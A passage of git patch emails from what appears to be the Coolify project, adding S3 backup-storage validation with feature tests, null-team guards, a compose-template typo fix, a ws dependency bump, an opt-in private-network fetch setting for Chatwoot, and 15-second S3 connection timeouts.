 function refreshSession(?Team $team = null): void
 {
     if (! $team) {
-        if (Auth::user()->currentTeam()) {
-            $team = Team::find(Auth::user()->currentTeam()->id);
-        } else {
-            $team = User::find(Auth::id())->teams->first();
+        $currentTeam = Auth::user()->currentTeam();
+        if ($currentTeam) {
+            // currentTeam() can resolve a stale (just-deleted) team from the
+            // session/cache, so Team::find() may still return null here.
+            $team = Team::find($currentTeam->id);
+        }
+        if (! $team) {
+            // Fall back to any team the user still belongs to.
+            $team = User::find(Auth::id())->teams()->first();
         }
     }
+
     // Clear old cache key format for backwards compatibility
     Cache::forget('team:'.Auth::id());
+
+    if (! $team) {
+        // The user has no team left (e.g. just deleted their current team and
+        // belongs to no other): clear the stale session reference instead of
+        // dereferencing null.
+        session()->forget('currentTeam');
+
+        return;
+    }
+
     // Use new cache key format that includes team ID
     Cache::forget('user:'.Auth::id().':team:'.$team->id);
     Cache::remember('user:'.Auth::id().':team:'.$team->id, 3600, function () use ($team) {

From a4d75ff0e28b8a9a5a9f4ea58ef32a87b7b4ec24 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 23 May 2026 13:06:36 +0200
Subject: [PATCH 25/90] fix(backups): validate S3 storage before backup
 scheduling

Prevent scheduled database backups from enabling S3 uploads without a valid team-owned storage configuration, and preserve the previous S3 storage ID in missing-storage error messages.

Add coverage for backup edit/create validation and S3 upload failure messaging.
---
 app/Jobs/DatabaseBackupJob.php                |   4 +-
 app/Livewire/Project/Database/BackupEdit.php  |  16 ++-
 .../Database/CreateScheduledBackup.php        |  11 +-
 app/Models/S3Storage.php                      |   1 +
 .../ScheduledDatabaseBackupExecution.php      |   1 +
 tests/Feature/BackupEditValidationTest.php    |  85 +++++++++++++++
 .../CreateScheduledBackupValidationTest.php   | 102 ++++++++++++++++++
 tests/Feature/DatabaseBackupJobTest.php       |  42 ++++++++
 8 files changed, 256 insertions(+), 6 deletions(-)
 create mode 100644 tests/Feature/BackupEditValidationTest.php
 create mode 100644 tests/Feature/CreateScheduledBackupValidationTest.php

diff --git a/app/Jobs/DatabaseBackupJob.php b/app/Jobs/DatabaseBackupJob.php
index bd31ab0c3..64e900b49 100644
--- a/app/Jobs/DatabaseBackupJob.php
+++ b/app/Jobs/DatabaseBackupJob.php
@@ -668,12 +668,14 @@ private function calculate_size()
     private function upload_to_s3(): void
     {
         if (is_null($this->s3)) {
+            $previousS3StorageId = $this->backup->s3_storage_id;
+
             $this->backup->update([
                 'save_s3' => false,
                 's3_storage_id' => null,
             ]);
 
-            throw new \Exception('S3 storage configuration is missing or has been deleted (S3 storage ID: '.($this->backup->s3_storage_id ?? 'null').'). S3 backup has been disabled for this schedule.');
+            throw new \Exception('S3 storage configuration is missing or has been deleted (S3 storage ID: '.($previousS3StorageId ?? 'null').'). S3 backup has been disabled for this schedule.');
         }
 
         try {
diff --git a/app/Livewire/Project/Database/BackupEdit.php b/app/Livewire/Project/Database/BackupEdit.php
index a18022882..ef106a65f 100644
--- a/app/Livewire/Project/Database/BackupEdit.php
+++ b/app/Livewire/Project/Database/BackupEdit.php
@@ -3,6 +3,7 @@
 namespace App\Livewire\Project\Database;
 
 use App\Models\ScheduledDatabaseBackup;
+use App\Models\ServiceDatabase;
 use Exception;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Attributes\Locked;
@@ -144,7 +145,7 @@ public function delete($password, $selectedActions = [])
 
         try {
             $server = null;
-            if ($this->backup->database instanceof \App\Models\ServiceDatabase) {
+            if ($this->backup->database instanceof ServiceDatabase) {
                 $server = $this->backup->database->service->destination->server;
             } elseif ($this->backup->database->destination && $this->backup->database->destination->server) {
                 $server = $this->backup->database->destination->server;
@@ -170,7 +171,7 @@ public function delete($password, $selectedActions = [])
 
             $this->backup->delete();
 
-            if ($this->backup->database->getMorphClass() === \App\Models\ServiceDatabase::class) {
+            if ($this->backup->database->getMorphClass() === ServiceDatabase::class) {
                 $serviceDatabase = $this->backup->database;
 
                 return redirect()->route('project.service.database.backups', [
@@ -182,7 +183,7 @@ public function delete($password, $selectedActions = [])
             } else {
                 return redirect()->route('project.database.backup.index', $this->parameters);
             }
-        } catch (\Exception $e) {
+        } catch (Exception $e) {
             $this->dispatch('error', 'Failed to delete backup: '.$e->getMessage());
 
             return handleError($e, $this);
@@ -207,6 +208,13 @@ private function customValidate()
             $this->backup->s3_storage_id = null;
         }
 
+        // S3 backup cannot be enabled without a valid S3 storage owned by the team
+        $availableS3Ids = collect($this->s3s)->pluck('id');
+        if ($this->backup->save_s3 && ! $availableS3Ids->contains($this->backup->s3_storage_id)) {
+            $this->backup->save_s3 = $this->saveS3 = false;
+            $this->backup->s3_storage_id = $this->s3StorageId = null;
+        }
+
         // Validate that disable_local_backup can only be true when S3 backup is enabled
         if ($this->backup->disable_local_backup && ! $this->backup->save_s3) {
             $this->backup->disable_local_backup = $this->disableLocalBackup = false;
@@ -214,7 +222,7 @@ private function customValidate()
 
         $isValid = validate_cron_expression($this->backup->frequency);
         if (! $isValid) {
-            throw new \Exception('Invalid Cron / Human expression');
+            throw new Exception('Invalid Cron / Human expression');
         }
         $this->validate();
     }
diff --git a/app/Livewire/Project/Database/CreateScheduledBackup.php b/app/Livewire/Project/Database/CreateScheduledBackup.php
index 7f807afe2..bb8b8b9c7 100644
--- a/app/Livewire/Project/Database/CreateScheduledBackup.php
+++ b/app/Livewire/Project/Database/CreateScheduledBackup.php
@@ -3,6 +3,7 @@
 namespace App\Livewire\Project\Database;
 
 use App\Models\ScheduledDatabaseBackup;
+use App\Models\ServiceDatabase;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Illuminate\Support\Collection;
 use Livewire\Attributes\Locked;
@@ -48,6 +49,14 @@ public function submit()
 
             $this->validate();
 
+            if ($this->saveToS3) {
+                if (is_null($this->s3StorageId) || ! $this->definedS3s->contains('id', $this->s3StorageId)) {
+                    $this->dispatch('error', 'Please select a valid S3 storage to enable S3 backups.');
+
+                    return;
+                }
+            }
+
             $isValid = validate_cron_expression($this->frequency);
             if (! $isValid) {
                 $this->dispatch('error', 'Invalid Cron / Human expression.');
@@ -74,7 +83,7 @@ public function submit()
             }
 
             $databaseBackup = ScheduledDatabaseBackup::create($payload);
-            if ($this->database->getMorphClass() === \App\Models\ServiceDatabase::class) {
+            if ($this->database->getMorphClass() === ServiceDatabase::class) {
                 $this->dispatch('refreshScheduledBackups', $databaseBackup->id);
             } else {
                 $this->dispatch('refreshScheduledBackups');
diff --git a/app/Models/S3Storage.php b/app/Models/S3Storage.php
index 3f6ee51cc..fca74170d 100644
--- a/app/Models/S3Storage.php
+++ b/app/Models/S3Storage.php
@@ -15,6 +15,7 @@ class S3Storage extends BaseModel
     use HasFactory, HasSafeStringAttribute;
 
     protected $fillable = [
+        'team_id',
         'name',
         'description',
         'region',
diff --git a/app/Models/ScheduledDatabaseBackupExecution.php b/app/Models/ScheduledDatabaseBackupExecution.php
index 51ad46de9..1d5f5f9ce 100644
--- a/app/Models/ScheduledDatabaseBackupExecution.php
+++ b/app/Models/ScheduledDatabaseBackupExecution.php
@@ -23,6 +23,7 @@ class ScheduledDatabaseBackupExecution extends BaseModel
     protected function casts(): array
     {
         return [
+            'size' => 'integer',
             's3_uploaded' => 'boolean',
             'local_storage_deleted' => 'boolean',
             's3_storage_deleted' => 'boolean',
diff --git a/tests/Feature/BackupEditValidationTest.php b/tests/Feature/BackupEditValidationTest.php
new file mode 100644
index 000000000..8894f0f69
--- /dev/null
+++ b/tests/Feature/BackupEditValidationTest.php
@@ -0,0 +1,85 @@
+<?php
+
+use App\Livewire\Project\Database\BackupEdit;
+use App\Models\Environment;
+use App\Models\InstanceSettings;
+use App\Models\Project;
+use App\Models\ScheduledDatabaseBackup;
+use App\Models\Server;
+use App\Models\StandaloneDocker;
+use App\Models\StandalonePostgresql;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Livewire\Livewire;
+
+uses(RefreshDatabase::class);
+
+function createBackupForEditValidationTest(Team $team, array $overrides = []): ScheduledDatabaseBackup
+{
+    $server = Server::factory()->create(['team_id' => $team->id]);
+    $destination = StandaloneDocker::where('server_id', $server->id)->firstOrFail();
+    $project = Project::factory()->create(['team_id' => $team->id]);
+    $environment = Environment::factory()->create(['project_id' => $project->id]);
+
+    $database = StandalonePostgresql::create([
+        'name' => 'pg-backup-edit-validation',
+        'image' => 'postgres:16-alpine',
+        'postgres_user' => 'postgres',
+        'postgres_password' => 'password',
+        'postgres_db' => 'postgres',
+        'environment_id' => $environment->id,
+        'destination_id' => $destination->id,
+        'destination_type' => $destination->getMorphClass(),
+    ]);
+
+    return ScheduledDatabaseBackup::create(array_merge([
+        'frequency' => '0 0 * * *',
+        'save_s3' => true,
+        's3_storage_id' => null,
+        'database_type' => $database->getMorphClass(),
+        'database_id' => $database->id,
+        'team_id' => $team->id,
+    ], $overrides));
+}
+
+beforeEach(function () {
+    if (InstanceSettings::find(0) === null) {
+        $settings = new InstanceSettings;
+        $settings->id = 0;
+        $settings->save();
+    }
+
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->user->teams()->attach($this->team, ['role' => 'owner']);
+    $this->actingAs($this->user);
+    session(['currentTeam' => $this->team]);
+});
+
+it('disables S3 backup when saved without a selected S3 storage', function () {
+    $backup = createBackupForEditValidationTest($this->team);
+
+    Livewire::test(BackupEdit::class, ['backup' => $backup->fresh(), 's3s' => $this->team->s3s])
+        ->call('submit')
+        ->assertDispatched('success');
+
+    $backup->refresh();
+    expect($backup->save_s3)->toBeFalsy();
+    expect($backup->s3_storage_id)->toBeNull();
+});
+
+it('cascades to disabling local backup deletion when S3 is force-disabled', function () {
+    $backup = createBackupForEditValidationTest($this->team, [
+        'disable_local_backup' => true,
+    ]);
+
+    Livewire::test(BackupEdit::class, ['backup' => $backup->fresh(), 's3s' => $this->team->s3s])
+        ->call('submit')
+        ->assertDispatched('success');
+
+    $backup->refresh();
+    expect($backup->save_s3)->toBeFalsy();
+    expect($backup->s3_storage_id)->toBeNull();
+    expect($backup->disable_local_backup)->toBeFalsy();
+});
diff --git a/tests/Feature/CreateScheduledBackupValidationTest.php b/tests/Feature/CreateScheduledBackupValidationTest.php
new file mode 100644
index 000000000..a167511e2
--- /dev/null
+++ b/tests/Feature/CreateScheduledBackupValidationTest.php
@@ -0,0 +1,102 @@
+<?php
+
+use App\Livewire\Project\Database\CreateScheduledBackup;
+use App\Models\Environment;
+use App\Models\Project;
+use App\Models\S3Storage;
+use App\Models\ScheduledDatabaseBackup;
+use App\Models\Server;
+use App\Models\StandaloneDocker;
+use App\Models\StandalonePostgresql;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Livewire\Livewire;
+
+uses(RefreshDatabase::class);
+
+function createDatabaseForScheduledBackupTest(Team $team): StandalonePostgresql
+{
+    $server = Server::factory()->create(['team_id' => $team->id]);
+    $destination = StandaloneDocker::where('server_id', $server->id)->firstOrFail();
+    $project = Project::factory()->create(['team_id' => $team->id]);
+    $environment = Environment::factory()->create(['project_id' => $project->id]);
+
+    return StandalonePostgresql::create([
+        'name' => 'pg-scheduled-backup-validation',
+        'image' => 'postgres:16-alpine',
+        'postgres_user' => 'postgres',
+        'postgres_password' => 'password',
+        'postgres_db' => 'postgres',
+        'environment_id' => $environment->id,
+        'destination_id' => $destination->id,
+        'destination_type' => $destination->getMorphClass(),
+    ]);
+}
+
+function createS3StorageForTeam(Team $team, string $name = 'Test S3'): S3Storage
+{
+    return S3Storage::create([
+        'name' => $name,
+        'region' => 'us-east-1',
+        'key' => 'test-key',
+        'secret' => 'test-secret',
+        'bucket' => 'test-bucket',
+        'endpoint' => 'https://s3.example.com',
+        'is_usable' => true,
+        'team_id' => $team->id,
+    ]);
+}
+
+beforeEach(function () {
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->user->teams()->attach($this->team, ['role' => 'owner']);
+    $this->actingAs($this->user);
+    session(['currentTeam' => $this->team]);
+});
+
+it('rejects enabling S3 backup without a selected S3 storage', function () {
+    $database = createDatabaseForScheduledBackupTest($this->team);
+
+    Livewire::test(CreateScheduledBackup::class, ['database' => $database])
+        ->set('frequency', '0 0 * * *')
+        ->set('saveToS3', true)
+        ->set('s3StorageId', null)
+        ->call('submit')
+        ->assertDispatched('error');
+
+    expect(ScheduledDatabaseBackup::count())->toBe(0);
+});
+
+it('rejects an S3 storage not owned by the current team', function () {
+    $database = createDatabaseForScheduledBackupTest($this->team);
+
+    $foreignS3 = createS3StorageForTeam(Team::factory()->create(), 'Foreign S3');
+
+    Livewire::test(CreateScheduledBackup::class, ['database' => $database])
+        ->set('frequency', '0 0 * * *')
+        ->set('saveToS3', true)
+        ->set('s3StorageId', $foreignS3->id)
+        ->call('submit')
+        ->assertDispatched('error');
+
+    expect(ScheduledDatabaseBackup::count())->toBe(0);
+});
+
+it('creates a scheduled backup with a valid team-owned S3 storage', function () {
+    $database = createDatabaseForScheduledBackupTest($this->team);
+    $s3 = createS3StorageForTeam($this->team);
+
+    Livewire::test(CreateScheduledBackup::class, ['database' => $database])
+        ->set('frequency', '0 0 * * *')
+        ->set('saveToS3', true)
+        ->set('s3StorageId', $s3->id)
+        ->call('submit')
+        ->assertDispatched('refreshScheduledBackups');
+
+    $backup = ScheduledDatabaseBackup::first();
+    expect($backup)->not->toBeNull();
+    expect($backup->save_s3)->toBeTruthy();
+    expect($backup->s3_storage_id)->toBe($s3->id);
+});
diff --git a/tests/Feature/DatabaseBackupJobTest.php b/tests/Feature/DatabaseBackupJobTest.php
index 05cb21f12..2d549c1ca 100644
--- a/tests/Feature/DatabaseBackupJobTest.php
+++ b/tests/Feature/DatabaseBackupJobTest.php
@@ -66,6 +66,48 @@
     expect($backup->s3_storage_id)->toBeNull();
 });
 
+test('upload_to_s3 exception message reports the previous s3 storage id', function () {
+    $backup = ScheduledDatabaseBackup::create([
+        'frequency' => '0 0 * * *',
+        'save_s3' => true,
+        's3_storage_id' => 12345,
+        'database_type' => 'App\Models\StandalonePostgresql',
+        'database_id' => 1,
+        'team_id' => Team::factory()->create()->id,
+    ]);
+
+    $job = new DatabaseBackupJob($backup);
+
+    $reflection = new ReflectionClass($job);
+    $reflection->getProperty('s3')->setValue($job, null);
+
+    expect(fn () => $reflection->getMethod('upload_to_s3')->invoke($job))
+        ->toThrow(Exception::class, 'S3 storage ID: 12345');
+
+    $backup->refresh();
+    expect($backup->save_s3)->toBeFalsy();
+    expect($backup->s3_storage_id)->toBeNull();
+});
+
+test('upload_to_s3 exception message reports null when no previous s3 storage id exists', function () {
+    $backup = ScheduledDatabaseBackup::create([
+        'frequency' => '0 0 * * *',
+        'save_s3' => true,
+        's3_storage_id' => null,
+        'database_type' => 'App\Models\StandalonePostgresql',
+        'database_id' => 1,
+        'team_id' => Team::factory()->create()->id,
+    ]);
+
+    $job = new DatabaseBackupJob($backup);
+
+    $reflection = new ReflectionClass($job);
+    $reflection->getProperty('s3')->setValue($job, null);
+
+    expect(fn () => $reflection->getMethod('upload_to_s3')->invoke($job))
+        ->toThrow(Exception::class, 'S3 storage ID: null');
+});
+
 test('deleting s3 storage disables s3 on linked backups', function () {
     $team = Team::factory()->create();
 

From 33e172ac24aa43ae89f1f93783f87abd77e6673d Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 23 May 2026 21:06:22 +0200
Subject: [PATCH 26/90] fix(backups): revalidate S3 storage on scheduled backup
 submit

Check the selected S3 storage against the database at submit time so
stale Livewire state cannot schedule backups with storage that was
reassigned or marked unusable after the component mounted.
---
 .../Database/CreateScheduledBackup.php        |  9 ++++-
 .../CreateScheduledBackupValidationTest.php   | 36 +++++++++++++++++++
 2 files changed, 44 insertions(+), 1 deletion(-)

diff --git a/app/Livewire/Project/Database/CreateScheduledBackup.php b/app/Livewire/Project/Database/CreateScheduledBackup.php
index bb8b8b9c7..7384adcff 100644
--- a/app/Livewire/Project/Database/CreateScheduledBackup.php
+++ b/app/Livewire/Project/Database/CreateScheduledBackup.php
@@ -2,6 +2,7 @@
 
 namespace App\Livewire\Project\Database;
 
+use App\Models\S3Storage;
 use App\Models\ScheduledDatabaseBackup;
 use App\Models\ServiceDatabase;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
@@ -50,7 +51,13 @@ public function submit()
             $this->validate();
 
             if ($this->saveToS3) {
-                if (is_null($this->s3StorageId) || ! $this->definedS3s->contains('id', $this->s3StorageId)) {
+                $s3StorageExists = ! is_null($this->s3StorageId)
+                    && S3Storage::where('team_id', currentTeam()->id)
+                        ->where('is_usable', true)
+                        ->whereKey($this->s3StorageId)
+                        ->exists();
+
+                if (! $s3StorageExists) {
                     $this->dispatch('error', 'Please select a valid S3 storage to enable S3 backups.');
 
                     return;
diff --git a/tests/Feature/CreateScheduledBackupValidationTest.php b/tests/Feature/CreateScheduledBackupValidationTest.php
index a167511e2..4b5eec24c 100644
--- a/tests/Feature/CreateScheduledBackupValidationTest.php
+++ b/tests/Feature/CreateScheduledBackupValidationTest.php
@@ -84,6 +84,42 @@ function createS3StorageForTeam(Team $team, string $name = 'Test S3'): S3Storage
     expect(ScheduledDatabaseBackup::count())->toBe(0);
 });
 
+it('rejects an S3 storage that is reassigned after the component is mounted', function () {
+    $database = createDatabaseForScheduledBackupTest($this->team);
+    $s3 = createS3StorageForTeam($this->team);
+
+    $component = Livewire::test(CreateScheduledBackup::class, ['database' => $database])
+        ->set('frequency', '0 0 * * *')
+        ->set('saveToS3', true)
+        ->set('s3StorageId', $s3->id);
+
+    $s3->update(['team_id' => Team::factory()->create()->id]);
+
+    $component
+        ->call('submit')
+        ->assertDispatched('error');
+
+    expect(ScheduledDatabaseBackup::count())->toBe(0);
+});
+
+it('rejects an S3 storage that becomes unusable after the component is mounted', function () {
+    $database = createDatabaseForScheduledBackupTest($this->team);
+    $s3 = createS3StorageForTeam($this->team);
+
+    $component = Livewire::test(CreateScheduledBackup::class, ['database' => $database])
+        ->set('frequency', '0 0 * * *')
+        ->set('saveToS3', true)
+        ->set('s3StorageId', $s3->id);
+
+    $s3->update(['is_usable' => false]);
+
+    $component
+        ->call('submit')
+        ->assertDispatched('error');
+
+    expect(ScheduledDatabaseBackup::count())->toBe(0);
+});
+
 it('creates a scheduled backup with a valid team-owned S3 storage', function () {
     $database = createDatabaseForScheduledBackupTest($this->team);
     $s3 = createS3StorageForTeam($this->team);

From 4ccec6b2101786fde966e2e8eed2ca27a21c9ea5 Mon Sep 17 00:00:00 2001
From: Victor Gomez <73703121+viticodotdev@users.noreply.github.com>
Date: Mon, 25 May 2026 13:06:59 -0400
Subject: [PATCH 27/90] Fix typo in ALLOWED_HOSTS environment variable

---
 templates/compose/healthchecks.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/templates/compose/healthchecks.yaml b/templates/compose/healthchecks.yaml
index 15c284770..246fabb7b 100644
--- a/templates/compose/healthchecks.yaml
+++ b/templates/compose/healthchecks.yaml
@@ -13,7 +13,7 @@ services:
       - SERVICE_URL_HEALTHCHECKS_8000
       - DB=sqlite
       - DB_NAME=/data/hc.sqlite
-      - "ALLOWED_HOSTS=${ALOWED_HOSTS:-*}"
+      - "ALLOWED_HOSTS=${ALLOWED_HOSTS:-*}"
       - "REGISTRATION_OPEN=${REGISTRATION_OPEN:-True}"
       - "DEBUG=${DEBUG:-False}"
       - "SECRET_KEY=${SECRET_KEY:?${SERVICE_PASSWORD_64_HEALTHCHECKS}}"

From 98b36c1ff79fde236eba2765350fc5665d546081 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 27 May 2026 07:27:47 +0000
Subject: [PATCH 28/90] chore(deps): bump ws from 8.19.0 to 8.20.1 in
 /docker/coolify-realtime

Bumps [ws](https://github.com/websockets/ws) from 8.19.0 to 8.20.1.
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](https://github.com/websockets/ws/compare/8.19.0...8.20.1)

---
updated-dependencies:
- dependency-name: ws
  dependency-version: 8.20.1
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 docker/coolify-realtime/package-lock.json | 8 ++++----
 docker/coolify-realtime/package.json      | 2 +-
 2 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/docker/coolify-realtime/package-lock.json b/docker/coolify-realtime/package-lock.json
index 5c6fa94aa..cdb29bffa 100644
--- a/docker/coolify-realtime/package-lock.json
+++ b/docker/coolify-realtime/package-lock.json
@@ -10,7 +10,7 @@
                 "cookie": "1.1.1",
                 "dotenv": "17.3.1",
                 "node-pty": "1.1.0",
-                "ws": "8.19.0"
+                "ws": "8.20.1"
             }
         },
         "node_modules/@xterm/addon-fit": {
@@ -70,9 +70,9 @@
             }
         },
         "node_modules/ws": {
-            "version": "8.19.0",
-            "resolved": "https://registry.npmjs.org/ws/-/ws-8.19.0.tgz",
-            "integrity": "sha512-blAT2mjOEIi0ZzruJfIhb3nps74PRWTCz1IjglWEEpQl5XS/UNama6u2/rjFkDDouqr4L67ry+1aGIALViWjDg==",
+            "version": "8.20.1",
+            "resolved": "https://registry.npmjs.org/ws/-/ws-8.20.1.tgz",
+            "integrity": "sha512-It4dO0K5v//JtTXuPkfEOaI3uUN87iYPnqo/ZzqCoG3g8uhA66QUMs/SrM0YK7/NAu+r4LMh/9dq2A7k+rHs+w==",
             "license": "MIT",
             "engines": {
                 "node": ">=10.0.0"
diff --git a/docker/coolify-realtime/package.json b/docker/coolify-realtime/package.json
index 25bf786a8..9128c0c3f 100644
--- a/docker/coolify-realtime/package.json
+++ b/docker/coolify-realtime/package.json
@@ -7,6 +7,6 @@
         "cookie": "1.1.1",
         "dotenv": "17.3.1",
         "node-pty": "1.1.0",
-        "ws": "8.19.0"
+        "ws": "8.20.1"
     }
 }

From 885f6eb124d416a4071b750a240f2d92ded11513 Mon Sep 17 00:00:00 2001
From: Gabriel Peralta <tech@sit.moe>
Date: Wed, 27 May 2026 09:31:29 -0300
Subject: [PATCH 29/90] Chatwoot: Support allowlisted private API inbox
 webhooks

Self-hosted installations can now opt SafeFetch into private-network access after SSRF hardening. The default remains unchanged: private IP destinations are blocked unless the instance owner explicitly enables private-network requests with SAFE_FETCH_ALLOW_PRIVATE_NETWORK=true

This is a breaking change if you use latest tag and have evolution-api or similar deployed on coolify alongside chatwoot.
---
 templates/compose/chatwoot.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/templates/compose/chatwoot.yaml b/templates/compose/chatwoot.yaml
index 407e82bb3..87aaa2c05 100644
--- a/templates/compose/chatwoot.yaml
+++ b/templates/compose/chatwoot.yaml
@@ -38,6 +38,7 @@ services:
       - SMTP_USERNAME=${CHATWOOT_SMTP_USERNAME}
       - SMTP_PASSWORD=${CHATWOOT_SMTP_PASSWORD}
       - ACTIVE_STORAGE_SERVICE=${ACTIVE_STORAGE_SERVICE:-local}
+      - SAFE_FETCH_ALLOW_PRIVATE_NETWORK=${SAFE_FETCH_ALLOW_PRIVATE_NETWORK:-false}
     entrypoint: docker/entrypoints/rails.sh
     command: sh -c "bundle exec rails db:chatwoot_prepare && bundle exec rails s -p 3000 -b 0.0.0.0"
     volumes:

From c35d28f99b61cd856cce1740a17a271bed7f1c33 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 28 May 2026 17:13:18 +0200
Subject: [PATCH 30/90] fix(database): guard proxy listeners without a team

---
 .../Project/Database/Clickhouse/General.php         | 13 ++++++++++---
 app/Livewire/Project/Database/Dragonfly/General.php | 13 ++++++++++---
 app/Livewire/Project/Database/Keydb/General.php     | 13 ++++++++++---
 .../views/components/database-status-info.blade.php |  4 ++--
 4 files changed, 32 insertions(+), 11 deletions(-)

diff --git a/app/Livewire/Project/Database/Clickhouse/General.php b/app/Livewire/Project/Database/Clickhouse/General.php
index 857300926..694674326 100644
--- a/app/Livewire/Project/Database/Clickhouse/General.php
+++ b/app/Livewire/Project/Database/Clickhouse/General.php
@@ -42,12 +42,19 @@ class General extends Component
 
     public bool $isLogDrainEnabled = false;
 
-    public function getListeners()
+    public function getListeners(): array
     {
-        $teamId = Auth::user()->currentTeam()->id;
+        $user = Auth::user();
+        if (! $user) {
+            return [];
+        }
+        $team = $user->currentTeam();
+        if (! $team) {
+            return [];
+        }
 
         return [
-            "echo-private:team.{$teamId},DatabaseProxyStopped" => 'databaseProxyStopped',
+            "echo-private:team.{$team->id},DatabaseProxyStopped" => 'databaseProxyStopped',
         ];
     }
 
diff --git a/app/Livewire/Project/Database/Dragonfly/General.php b/app/Livewire/Project/Database/Dragonfly/General.php
index 01a474761..f196b9dfb 100644
--- a/app/Livewire/Project/Database/Dragonfly/General.php
+++ b/app/Livewire/Project/Database/Dragonfly/General.php
@@ -40,12 +40,19 @@ class General extends Component
 
     public bool $isLogDrainEnabled = false;
 
-    public function getListeners()
+    public function getListeners(): array
     {
-        $teamId = Auth::user()->currentTeam()->id;
+        $user = Auth::user();
+        if (! $user) {
+            return [];
+        }
+        $team = $user->currentTeam();
+        if (! $team) {
+            return [];
+        }
 
         return [
-            "echo-private:team.{$teamId},DatabaseProxyStopped" => 'databaseProxyStopped',
+            "echo-private:team.{$team->id},DatabaseProxyStopped" => 'databaseProxyStopped',
         ];
     }
 
diff --git a/app/Livewire/Project/Database/Keydb/General.php b/app/Livewire/Project/Database/Keydb/General.php
index 6031cb7ac..974803e8d 100644
--- a/app/Livewire/Project/Database/Keydb/General.php
+++ b/app/Livewire/Project/Database/Keydb/General.php
@@ -42,12 +42,19 @@ class General extends Component
 
     public bool $isLogDrainEnabled = false;
 
-    public function getListeners()
+    public function getListeners(): array
     {
-        $teamId = Auth::user()->currentTeam()->id;
+        $user = Auth::user();
+        if (! $user) {
+            return [];
+        }
+        $team = $user->currentTeam();
+        if (! $team) {
+            return [];
+        }
 
         return [
-            "echo-private:team.{$teamId},DatabaseProxyStopped" => 'databaseProxyStopped',
+            "echo-private:team.{$team->id},DatabaseProxyStopped" => 'databaseProxyStopped',
         ];
     }
 
diff --git a/resources/views/components/database-status-info.blade.php b/resources/views/components/database-status-info.blade.php
index a7c8dade1..4a9de3ca5 100644
--- a/resources/views/components/database-status-info.blade.php
+++ b/resources/views/components/database-status-info.blade.php
@@ -63,7 +63,7 @@
                     @else
                         <x-forms.checkbox id="enableSsl" label="Enable SSL" wire:model.live="enableSsl"
                             instantSave="instantSaveSSL" disabled
-                            helper="Database should be stopped to change this settings." canGate="update"
+                            helper="Database should be stopped to change this setting." canGate="update"
                             :canResource="$database" />
                     @endif
                 </div>
@@ -79,7 +79,7 @@
                             </x-forms.select>
                         @else
                             <x-forms.select id="sslMode" label="SSL Mode" instantSave="instantSaveSSL" disabled
-                                helper="Database should be stopped to change this settings." canGate="update"
+                                helper="Database should be stopped to change this setting." canGate="update"
                                 :canResource="$database">
                                 @foreach ($sslModeOptions as $value => $option)
                                     <option value="{{ $value }}" title="{{ $option['title'] ?? '' }}">{{ $option['label'] }}</option>

From dd8a0d501de740c1b6ead3789d5661b25615d19c Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 28 May 2026 17:31:11 +0200
Subject: [PATCH 31/90] fix(s3): cap connection checks at 15 seconds

Return a friendly timeout error for failed S3 endpoint checks while
preserving the original exception as the previous throwable.
---
 app/Models/S3Storage.php     | 27 ++++++++++++-
 tests/Unit/S3StorageTest.php | 73 ++++++++++++++++++++++++++++++++++--
 2 files changed, 95 insertions(+), 5 deletions(-)

diff --git a/app/Models/S3Storage.php b/app/Models/S3Storage.php
index 3f6ee51cc..90232a151 100644
--- a/app/Models/S3Storage.php
+++ b/app/Models/S3Storage.php
@@ -14,6 +14,10 @@ class S3Storage extends BaseModel
 {
     use HasFactory, HasSafeStringAttribute;
 
+    private const CONNECTION_TIMEOUT_SECONDS = 15;
+
+    private const REQUEST_TIMEOUT_SECONDS = 15;
+
     protected $fillable = [
         'name',
         'description',
@@ -157,6 +161,10 @@ public function testConnection(bool $shouldSave = false)
                 'bucket' => $this['bucket'],
                 'endpoint' => $this['endpoint'],
                 'use_path_style_endpoint' => true,
+                'http' => [
+                    'connect_timeout' => self::CONNECTION_TIMEOUT_SECONDS,
+                    'timeout' => self::REQUEST_TIMEOUT_SECONDS,
+                ],
             ]);
             // Test the connection by listing files with ListObjectsV2 (S3)
             $disk->files();
@@ -164,11 +172,12 @@ public function testConnection(bool $shouldSave = false)
             $this->unusable_email_sent = false;
             $this->is_usable = true;
         } catch (\Throwable $e) {
+            $exception = $this->toUserFriendlyConnectionException($e);
             $this->is_usable = false;
             if ($this->unusable_email_sent === false && is_transactional_emails_enabled()) {
                 $mail = new MailMessage;
                 $mail->subject('Coolify: S3 Storage Connection Error');
-                $mail->view('emails.s3-connection-error', ['name' => $this->name, 'reason' => $e->getMessage(), 'url' => route('storage.show', ['storage_uuid' => $this->uuid])]);
+                $mail->view('emails.s3-connection-error', ['name' => $this->name, 'reason' => $exception->getMessage(), 'url' => route('storage.show', ['storage_uuid' => $this->uuid])]);
 
                 // Load the team with its members and their roles explicitly
                 $team = $this->team()->with(['members' => function ($query) {
@@ -183,11 +192,25 @@ public function testConnection(bool $shouldSave = false)
                 $this->unusable_email_sent = true;
             }
 
-            throw $e;
+            throw $exception;
         } finally {
             if ($shouldSave) {
                 $this->save();
             }
         }
     }
+
+    private function toUserFriendlyConnectionException(\Throwable $exception): \Throwable
+    {
+        $message = str($exception->getMessage())->lower();
+
